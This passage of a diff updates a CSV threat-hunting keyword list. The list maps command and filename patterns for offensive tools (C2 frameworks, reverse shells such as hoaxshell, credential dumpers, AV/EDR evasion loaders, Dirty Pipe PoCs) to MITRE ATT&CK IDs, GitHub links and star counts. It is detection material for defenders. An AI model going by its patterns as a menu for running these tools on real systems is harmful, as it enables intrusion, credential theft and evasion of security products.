pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*./agscript *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./awsloot *","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*./awsloot.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" -"*./Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*./Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*./c2lint *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*./chisel *","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./cowpy.sh *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" 
@@ -2157,61 +2157,61 @@ "*./Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*./Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*./dnscat*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" -"*./dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" -"*./donut *.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*./dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*./donut *.exe*","offensive_tool_keyword","havoc","Havoc 
is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*./encryptor -f *.exe -o *.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" "*./Exfil.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*./exploit /etc/passwd 1 *cat /etc/passwd*","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","0","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" "*./exploit /etc/passwd 1 ootz:*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - 
TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" -"*./fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*./fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*./fee.py*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*./gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" "*./getExploit*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. 
but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*./gimmeSH*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" -"*./go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*./go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" "*./hashcat -*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" -"*./hashview/*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - 
T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*./Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*./havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*./hashview/*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*./Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*./havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 
- T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*./hoaxshell*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" -"*./hping *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" -"*./hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*./inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*./hping *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*./hydra *","offensive_tool_keyword","thc-hydra","Parallelized login 
cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*./inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*./koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*./Lalin.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*./litefuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" -"*./lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*./lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*./manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*./Microsploit*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" -"*./monkey.sh*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*./monkey.sh*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*./mythic-cli *","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" "*./Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - 
TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*./ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*./nysm/src/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*./ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*./nysm/src/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" "*./pachine.py*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" -"*./Passdetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API 
keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*./Passdetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" "*./Pcredz *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" "*./Phishing.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*./pwndrop *","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*./PyShell *","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. 
This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","0","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" -"*./RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*./RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*./redirector.py *","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*./rpcrt.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - 